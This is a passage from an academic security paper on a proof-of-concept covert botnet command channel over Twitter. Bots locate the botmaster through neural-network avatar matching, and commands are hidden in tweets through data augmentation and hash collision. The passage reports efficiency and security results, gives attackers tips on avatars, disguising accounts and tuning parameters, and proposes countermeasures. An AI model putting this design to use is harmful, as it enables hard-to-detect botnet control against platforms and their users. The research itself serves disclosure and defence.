All commands in the experiments were received and parsed correctly by bots. During the tests, botmaster completed tweet collection, sentence generation and hash calculation in 13.8s on average, and reached a success rate of 90.28% for hash collision. After the selection of a trend, bots try to crawl 1K tweets and usually get 800-900 non-repeated tweets (since only the original tweets of retweets are saved). Bots need to crawl the avatars of the tweeters and compare the avatars with the selected vector to calculate the distances and determine whether botmaster is found. Due to different network and device conditions, the time this process costs varies. The time costs of bots finding botmaster were extracted from the logs and are shown in Table VI. It took 5s to 4.45 min to find botmaster after crawling the tweets among all bots. After bots obtained the IPs, botmaster deleted the posted tweets.

V-B Efficiency

V-B1 Tweets Generation

To test the efficiency of tweet generation for botmaster, we selected 79 trends from 4 randomly selected English-speaking areas around the world (San Francisco, London, Sydney, and Johannesburg). 1K tweets were crawled for each trend. We cleaned the crawled tweets using the method described in IV-C3 and generated 50 new sentences with EDA for each remaining tweet. As keywords for trends, trending topics may contain one or more words. With the random deletion and random swap adopted in EDA, keywords in topics may be deleted or change position in the newly generated sentences. If botmaster posts sentences without accurate keywords, bots cannot find botmaster's account in the tweets crawled for the trend. Therefore, the number of sentences containing the keywords is recorded along with the total number of generated sentences. The generation was conducted on an Ubuntu 18.04 x64 virtual server with 1GB RAM and 1 vCPU. Of the 79 selected trends, 55 contain only one word and 24 contain more than one word. The results show that 89.54% of the newly generated sentences contain the accurate keyword for the 55 one-word trends, and 77.55% contain the accurate keywords for the 24 multi-word trends.

Fig. 7: Efficiency of Tweets Generation
Sentences generated in a given time:
Time (s)  1      2      3      5      10     15     20
Qty.      10262  14232  18202  26142  45993  65843  85694

Time cost for a given quantity:
Qty.      10K    20K    30K    50K    100K   150K   200K
Time (s)  0.93   3.45   5.97   11.01  23.60  36.20  48.79
TABLE VII: Guideline for Efficiency of Tweets Generation

The generation time and the quantity of sentences are linearly related, as shown in Fig. 7. Table VII samples how many sentences can be generated in a given time and the time cost for generating a given quantity of sentences. As mentioned in IV-C3, EDA gets botmaster 20K to 45K sentences in this experiment. According to this test, it costs 3 to 10 seconds to generate those sentences, which is acceptable for botmaster when preparing sentences for hash collision.

V-B2 Hash Collision

We use the sentences generated above to test the efficiency of hash collision. To prepare different quantities of sentences, we follow the method in IV-C3, converting case and adding punctuation at the end of each sentence. For each trend, we get 4 batches of new sentences incrementally by adding 2 conversions at a time. We also collected 100 C&C server addresses as commands from the threat report [10]. We say a batch of sentences "hits" an IP if the batch succeeds in the hash collision for that IP. We use these new batches of sentences and hashlib in Python 3.6.9 to calculate hashes (SHA-256) on the same Ubuntu machine with a single thread, and record the time costs and hit rates of hash collision with different quantities of sentences.

Fig. 8: Time Costs and Hit Rate of Hash Collision

As shown in Fig. 8, it takes less than 1 second to calculate the hashes. In theory, 65,536 (2^16) sentences suffice to hit an IP part, but this is only the expectation, as hash collision is probabilistic. The experiment shows that at least 200K sentences are needed for a 90% hit rate, and more than 330K for a nearly 100% hit rate. As mentioned in IV-C3, there are usually 140K to more than 300K sentences for botmaster to perform a hash collision, which results in a hit rate of over 75%. During the experiments on Twitter, botmaster got an average of 219,335 sentences for each hash collision and reached a hit rate of 90.28%, which is acceptable for practical purposes.
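These thresholds are consistent with a simple model: each sentence's 16-bit hash prefix hits a given value with probability 1/65,536, and a command needs both halves hit. A back-of-envelope check, assuming uniform and independent prefixes:

```python
def hit_rate(n):
    """P(both 16-bit halves collided) from n candidate sentences, assuming
    uniform, independent 16-bit hash prefixes."""
    p_half = 1 - (1 - 2 ** -16) ** n
    return p_half ** 2

print(f"{hit_rate(200_000):.1%}")  # ~90.8%, matching the observed ~90% threshold
print(f"{hit_rate(330_000):.1%}")  # ~98.7%, close to the reported near-100%
```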

V-B3 Avatar Recognition

To test the efficiency of avatar recognition by bots, we use the 40 vectors distributed with bots and 1,000 crawled avatars in size 400x400 to calculate distances on the same Ubuntu machine as above. The average time cost of extracting features from 1K avatars and calculating 1K distances is 11.92s. This is also acceptable for bots under such hardware conditions. In real scenarios, this process may take longer, as bots must crawl the avatars before recognition, which varies with network conditions.

V-B4 Crawling Volume and Frequency

In this experiment, bots crawl 1K tweets 5 minutes after the selection of the trending topic every hour. In real scenarios, attackers can customize the waiting time, crawling volume and frequency to meet their needs. We conducted an experiment to test how many tweets bots need to crawl for different waiting times. We still collect trends in Johannesburg and select the last trend above 10K discussions for keywords. Then we use botmaster's account to post tweets that contain the keywords. Bots start to find botmaster's account using the keywords via the Twitter API after waiting for 5, 10, 20, 30, 45, 60, 90, 120, 150 and 180 minutes, and record how many tweets were crawled before finding botmaster. We collected 56 groups of data. Fig. 9 shows the relation between crawled tweet volume and waiting time. After waiting for 5 minutes, bots found botmaster within 1K tweets in all cases. After waiting for 1 hour, bots found botmaster within 1K tweets in 88% of cases, and within 3K tweets in 98%. Even 3 hours after botmaster posted the tweets, bots could still find botmaster within 1K tweets in 68% of cases and within 3K tweets in 89%.

Fig. 9: Crawling Volume and Frequency

The results may vary because attackers can set different rules for selecting the trending topic. If attackers choose top-ranked topics from the trending list, the topics receive more frequent tweet updates, so bots need to crawl more tweets to find botmaster within the same waiting time. Likewise, if attackers choose topics from bigger cities such as New York or Los Angeles, bots also need to crawl more tweets for the same waiting time. Publishing commands at midnight in the selected city also differs from doing so in the daytime. Attackers need to tune these parameters to their rules and needs.

V-C Security

In this part, we will discuss the security risks from the perspective of adversaries. Adversaries can 1) save avatars from botmaster’s accounts for future use, 2) train a GAN with the saved avatars to generate similar images, 3) reverse the neural network model to derive an image that can produce a similar vector, 4) collide a proper avatar using avatars from real Twitter users, 5) attack the model to let bot make wrong decisions on botmaster, and 6) generate adversarial samples to fool the model and bots.

V-C1 Save Avatars From Botmaster’s Accounts

Even though it is hard to guess the avatars used by botmasters, adversaries can monitor the behaviors of bots to identify botmaster's accounts and save the avatars they use. When the next appointed time approaches, adversaries could put on a saved avatar, select a trend and post tweets that contain fake commands. But this does not work in this scenario, because each avatar, vector and account is used only once. After a command is issued, the current avatar becomes invalid, and bots delete the corresponding stored vector. Even if adversaries put on botmaster's avatars, they cannot be recognized by bots.

V-C2 Train a GAN

Adversaries could train a GAN with the saved avatars to generate similar images. This is also unrealistic. The avatars from botmasters are not just human faces; they can be anything, such as animals, scenery, cars, plants, art, etc. Also, training a GAN needs numerous data, and the avatars from botmasters are seriously insufficient to build a training dataset. So it is also difficult to attack the C&C channel in this way.

V-C3 Reverse the Model

As adversaries can get the vectors and the neural network model from bots, they may try to recover or derive a similar image to cheat bots. The CNN makes the protection possible. Neural network models can achieve excellent accuracy on different tasks, but they have poor explainability [9]. It is not clear how neural networks make decisions, and it is also hard to reverse a neural network model. A CNN learns abstract features from raw images: each hidden layer integrates the output of the previous layer to generate a higher degree of abstraction, so different layers learn different levels of abstraction. As the layers get deeper, much of the information in the original image is lost. This makes it difficult to recover the original image, or derive a similar one, from the vectors and the model.

V-C4 Collide an Avatar

Adversaries may try to collide an avatar. It sounds possible but is still hard in practice. We analyzed the composition of the vectors. The 40 vectors mentioned above contain 5120 numbers. We sorted the numbers incrementally and put them into the coordinate system, as shown in Fig. 10. The numbers constitute a continuous interval from -0.350 to 0.264. Fig. 11 shows the distribution of the numbers. Although the numbers follow a normal distribution, each value in a vector of length 128 is still taken from a continuous interval, which is a huge space that is hard to enumerate or collide. This ensures the security of botmaster's avatars and vectors.

Fig. 10: Values of Vectors
Fig. 11: Distribution of Values in Vectors
Fig. 12: A Group of Avatars that Have Distances Below 0.02

Even so, we still attempted a collision for avatars. We made more than 0.6 billion calculations of the distances between pairs of the 115,887 crawled avatars. There are 2050 pairs with a distance below 0.02 (0.00031%), of which 81 pairs are below 0.01 (0.000012%). By analyzing these pictures, we found they share the same style: they all have a large solid-color background, especially a white background (mainly logos; see Fig. 12). As the avatars are prepared by attackers, they can avoid this type of picture. It is also recommended that attackers use colorful pictures taken with their own cameras instead of pictures from the Internet.

V-C5 Attack the Model

Adversaries can attack the neural network model so that bots make wrong decisions about botmaster's accounts. This is possible, as there are works on neural network trojan attacks [16]. However, it may affect one bot but does not influence the whole botnet: other unaffected bots can still make correct decisions about botmaster's accounts.

V-C6 Generate Adversarial Samples

As the model and feature vectors are known to adversaries, this scenario is a white-box, non-targeted adversarial attack. Adversaries can generate an adversarial sample to fool the model and bots. Adversarial attacks aim at misclassifying the original target, but this scenario is not a classification task: although the CNN has 128 outputs, there are no 128 classes of targets. A slight perturbation of the feature vector results in a distance above the threshold. Therefore, it is also hard to attack the botnet this way.

Even if adversaries happened to obtain an image that produces a similar vector, the size of the botnet could be probed, but the botnet cannot be taken over, as there is authentication between botmaster and bots on the C&C server (as in [26]). Cryptographic authentication is mandatory to ensure the security of C&C communication. All connections, commands and payloads between bots and the C&C server are protected by strong symmetric keys and asymmetric key pairs, which is practically impossible to break with current computing capacity.

VI Discussion and Related Works

VI-A Discussion

VI-A1 Options for Attackers

As a proof of concept, the parameters in this work are conservative. In fact, to enhance security, the length of the vectors can be longer than 128, which would make colliding avatars even more difficult. Also, the threshold for distances between avatars and vectors can be lower than 0.02, as the undistributed avatars and the distances are within the attackers' control and can be customized.

As shown in Table III and the discussions above, other fields on OSNs can also be used to convey customized contents to others. The openness of OSNs provides convenience for normal users but can also be exploited by malicious users. For instance, attackers could post anything under a trend, or comment anything on a tweet, and bots would identify botmaster by its avatar and get commands from botmaster's profile. Other platforms like Weibo and Tumblr are also capable of supporting command and control in this way.

To reduce the abnormal behaviors of botmaster's accounts, attackers could maintain the accounts by imitating normal users: posting tweets and retweeting, commenting on and "liking" other tweets every day, either manually or automatically. When attackers need to publish a command, they can select one account and maintain the other accounts as usual.

VI-A2 Possible Countermeasures

As many fields on OSNs could be exploited, OSNs should take responsibility for mitigating this attack. One possible method is to limit the contents that can be viewed anonymously: when OSNs are visited by unauthenticated users, not all contents are available. Normal users can still browse what they like, while bots may not retrieve the tweets posted by botmaster. This maintains openness and improves security on OSNs. Also, contents from unverified users could be served with a probability according to their behavioral credibility: higher credit for normal users and lower credit for abnormal or suspicious users. As different OSNs have different principles and policies for their contents, each can develop a suitable method for its platform to mitigate this attack.

As avatars and accounts are used only once when publishing commands, attackers need to prepare a number of Twitter accounts for botmasters. During the work on this paper, we found websites that sell Twitter accounts in bulk, and we cannot predict how buyers use those accounts. Since this violates the Twitter ToS, relevant parties should limit illegal account transactions so that botmasters cannot get enough accounts to publish more commands. Also, OSNs could upgrade their risk control for suspicious accounts and help users raise their account security level.

Traditional malware detection methods such as behavior analysis can also be applied in this case. Bots exhibit some periodic behaviors: according to the rules set by attackers, bots need to visit Twitter Trends periodically; after selecting a trending topic, they need to crawl tweets to find botmaster; and when identifying botmaster, they also need to crawl avatars from Twitter. This series of operations forms a behavioral pattern of bots, by which botnet activities can be detected.

As AI can be used to launch cyber attacks, security vendors should also take the malicious use of AI into consideration so that the attacks can be detected when they are applied in real scenarios in the future.

VI-B Related Works

This work provides a new perspective on the malicious use of AI. There are many works that discuss the combination of AI and attacks. In 2017, MalGAN [13] was proposed to generate adversarial malware examples that are able to bypass black-box machine-learning-based detection models. A generative network is trained to minimize the malicious probabilities of the generated adversarial examples as predicted by the black-box malware detector.

In 2018, DeepLocker [4] was proposed by researchers from IBM to carry out targeted attacks in a stealthy way. DeepLocker trains the target attributes and a secret key together into an AI model, and embeds the AI model and encrypted malicious code into benign applications. Target detection is conducted by the AI model: when the input attributes match the target attributes, the secret key is derived from the AI model to decrypt the payload and launch the attack on the target; if they do not match, the intent of the malicious code remains concealed, as no decryption key is available.

Rigaki [19] proposed using a GAN to mimic Facebook chat traffic to make C&C communication undetectable. In both their work and ours, AI is used to build covert communication. They use a GAN to mimic OSN traffic because mimicked traffic is harder to detect, while in our work there is no need to mimic OSN traffic, as all traffic here comes from real OSNs.

VII Conclusion

In this paper, we discussed a novel covert command and control channel on OSNs built by introducing AI technologies. By exploiting the poor explainability of neural network models, the way bots find botmaster (addressing) can be concealed in the AI models and is resistant to forensic analysis. To issue commands covertly, we use easy data augmentation and hash collision to generate contextual and readable command-embedded tweets, avoiding abnormal contents on OSNs. Experiments on Twitter show that this method is feasible and efficient.

This paper shows that AI is also capable of powering cyber attacks. With the popularity of AI, AI-powered cyber attacks will emerge and bring new challenges to cyber security. Cyber attack and defense are interdependent. We believe countermeasures against AI attacks will be applied in future computer systems, and protection for computer systems will become more intelligent. We hope the proposed scenario will contribute to future protection efforts.

References

  • [1] M. Bailey, E. Cooke, F. Jahanian, Y. Xu, and M. Karir. 2009. “A Survey of Botnet Technology and Defenses,” In 2009 Cybersecurity Applications Technology Conference for Homeland Security. 299–304.
  • [2] Jane Bromley, James W. Bentz, Léon Bottou, Isabelle Guyon, Yann LeCun, Cliff Moore, Eduard Säckinger, and Roopak Shah. 1993. “Signature Verification Using A “Siamese” Time Delay Neural Network,” 25–44.
  • [3] Antoine de Saint-Exupéry. 2019. “El Principito: The Little Prince,” Editorial Verbum.
  • [4] Dhilung Kirat, Jiyong Jang and Marc Ph. Stoecklin. 2018. “DeepLocker - Concealing Targeted Attacks with AI Locksmithing,” Technical Report. IBM Research.
  • [5] F-Secure. 2015. “The Dukes: 7 Years of Russian Cyberespionage,” Technical Report. F-Secure.
  • [6] Robert Falcone and Bryan Lee. 2019. “DarkHydrus delivers new Trojan that can use Google Drive for C2 communications,” Retrieved June 2, 2020 from https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/
  • [7] Matthieu Faou. 2020. “From Agent.Btz to Comrat V4: A ten-year journey,” Technical Report. ESET.
  • [8] FireEye. 2015. “Uncovering a Malware Backdoor that Uses Twitter,” Technical Report. FireEye.
  • [9] Freddy Lecue, Krishna Gade, Sahin Cem Geyik, Krishnaram Kenthapadi, Varun Mithal, Ankur Taly, Riccardo Guidotti and Pasquale Minervini. 2020. “Explainable AI: Foundations, Industrial Applications, Practical Challenges, and Lessons Learned,” Retrieved June 2, 2020 from https://xaitutorial2020.github.io/
  • [10] Group-IB. 2017. “Lazarus Arisen: Architecture, Techniques and Attribution,” Technical Report. Group-IB.
  • [11] Josh Grunzweig. 2018. “Comnie Continues to Target Organizations in East Asia,” Retrieved June 2, 2020 from https://unit42.paloaltonetworks.com/unit42-comnie-continues-target-organizations-east-asia/
  • [12] R. Hadsell, S. Chopra, and Y. LeCun. 2006. “Dimensionality Reduction by Learning an Invariant Mapping,” In 2006 IEEE Computer Society Conference on Computer Vision and Pattern Recognition (CVPR’06), Vol. 2. 1735–1742.
  • [13] Weiwei Hu and Ying Tan. 2017. “Generating Adversarial Malware Examples for Black-Box Attacks Based on GAN,” CoRR abs/1702.05983 (2017).
  • [14] Tom Lancaster and Esmid Idrizovic. 2017. “Paranoid PlugX,” Retrieved June 2, 2020 from https://unit42.paloaltonetworks.com/unit42-paranoid-plugx
  • [15] Y. LeCun, B. Boser, J. S. Denker, D. Henderson, R. E. Howard, W. Hubbard, and L. D. Jackel. 1989. “Backpropagation Applied to Handwritten Zip Code Recognition,” Neural Computation 1, 4 (1989), 541–551.
  • [16] Yingqi Liu, Shiqing Ma, Yousra Aafer, Wen-Chuan Lee, Juan Zhai, Weihang Wang, and Xiangyu Zhang. 2018. “Trojaning Attack on Neural Networks,” In 25th Annual Network and Distributed System Security Symposium, NDSS 2018, San Diego, California, USA, February 18-21, 2018.
  • [17] Angela Moscaritolo. 2009. “Twitter used as botnet command-and-control hub,” Retrieved June 2, 2020 from https://www.itnews.com.au/news/twitter-used-as-botnet-command-and-control-hub-153144
  • [18] Nick Pantic and Mohammad I. Husain. 2015. “Covert Botnet Command and Control Using Twitter,” In Proceedings of the 31st Annual Computer Security Applications Conference (Los Angeles, CA, USA) (ACSAC 2015). Association for Computing Machinery, New York, NY, USA, 171–180.
  • [19] Maria Rigaki and Sebastian Garcia. 2018. “Bringing a GAN to a Knife-Fight: Adapting Malware Communication to Avoid Detection,” In 2018 IEEE Security and Privacy Workshops, SP Workshops 2018, San Francisco, CA, USA, May 24, 2018. IEEE Computer Society, 70–75.
  • [20] Sanjeev Jagannatha Rao, Yufei Wang and Garrison Cottrell. 2016. “A Deep Siamese Neural Network Learns the Human-Perceived Similarity Structure of Facial Expressions Without Explicit Categories,” In Proceedings of the 38th Annual Conference of the Cognitive Science Society, Grodner D. Mirman D. Trueswell J.C. Papafragou, A. (Ed.). Cognitive Science Society, Cognitive Science Society, 217–222.
  • [21] S. Sebastian, S. Ayyappan, and V. P. 2014. “Framework for design of Graybot in social network,” In 2014 International Conference on Advances in Computing, Communications and Informatics (ICACCI). 2331–2336.
  • [22] Ashutosh Singh. 2012. “Social networking for botnet command and control,” (2012).
  • [23] Lukas Stefanko. 2018. “New Telegram-abusing Android RAT discovered in the wild,” Retrieved June 1, 2020 from https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/
  • [24] Twitter. 2020. “Twitter Terms of Service,” Retrieved June 1, 2020 from https://twitter.com/en/tos
  • [25] Twitter. 2020. “API reference index,” Retrieved Sept. 16, 2020 from https://developer.twitter.com/en/docs/api-reference-index
  • [26] P. Wang, S. Sparks, and C. C. Zou. 2010. “An Advanced Hybrid Peer-to-Peer Botnet,” IEEE Transactions on Dependable and Secure Computing 7, 2 (2010), 113–127.
  • [27] Warren Mercer, Paul Rascagneres and Matthew Molyett. 2017. “Introducing ROKRAT,” Retrieved June 2, 2020 from https://blog.talosintelligence.com/2017/04/introducing-rokrat.html
  • [28] Jason W. Wei and Kai Zou. 2019. “EDA: Easy Data Augmentation Techniques for Boosting Performance on Text Classification Tasks,” CoRR abs/1901.11196 (2019).
  • [29] Jie Yin, Heyang Lv, Fangjiao Zhang, Zhihong Tian, and Xiang Cui. 2018. “Study on Advanced Botnet Based on Publicly Available Resources,” In Information and Communications Security. Springer International Publishing, Cham, 57–74.